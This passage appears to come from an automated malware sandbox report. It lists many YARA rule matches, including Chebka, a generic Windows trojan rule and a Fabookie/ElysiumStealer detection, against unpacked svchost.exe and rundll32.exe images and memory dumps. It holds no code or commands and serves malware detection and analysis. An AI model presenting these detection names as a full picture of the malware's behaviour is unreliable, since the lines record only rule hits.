        Source: 32.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 7.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 7.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 9.2.svchost.exe.244fc400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 9.2.svchost.exe.244fc400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 22.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 22.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 34.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 34.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 23.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 23.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 18.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 18.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 34.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 34.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 37.2.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 37.2.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000016.00000000.334209589.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000011.00000000.309901416.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000013.00000002.799896262.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000012.00000000.315042115.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000013.00000000.322964992.000001B6D6000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001C.00000000.366681309.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000017.00000003.343921988.00000226F8CD0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000011.00000002.793245137.000001DBFC920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000017.00000000.344878717.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000019.00000000.351427652.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Fabookie / ElysiumStealer Author: ditekSHen
        Source: 00000005.00000002.438940018.0000000004490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001D.00000002.793955461.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000000B.00000000.304414332.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001D.00000000.371643562.000001F1ED200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000016.00000002.795207473.0000025139800000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001B.00000002.799640198.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000000B.00000002.534434032.000002D6CB270000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 0000001C.00000002.792847197.0000024E72070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000007.00000000.285707369.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000019.00000002.797248874.00000195990B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
        Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: Yara matchFile source: 20.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.svchost.exe.244fc400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.0.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 28.0.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 36.2.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.0.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.0.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 28.2.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 30.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 36.0.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 28.2.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 33.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 36.0.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 28.0.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 36.2.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.0.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 32.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.svchost.exe.244fc400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.0.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.0.svchost.exe.1dd8fdb0000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000013.00000003.320626740.000001B6D5F90000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000003.309142457.000001DBFC8B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000003.349705677.0000019599040000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000003.332972783.0000025139790000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.790719325.00000244FC120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000003.370419480.000001F1ED190000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000003.365853360.0000024E72000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000003.284991356.0000022BAF4C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.358306984.00000236F3370000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000003.314031590.000001F97F0B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000003.302119335.000002D6CB200000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.801674007.00000244FC400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000000.360534594.00000236F3940000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.794818374.00000226F8D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.794265303.000001F97F120000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
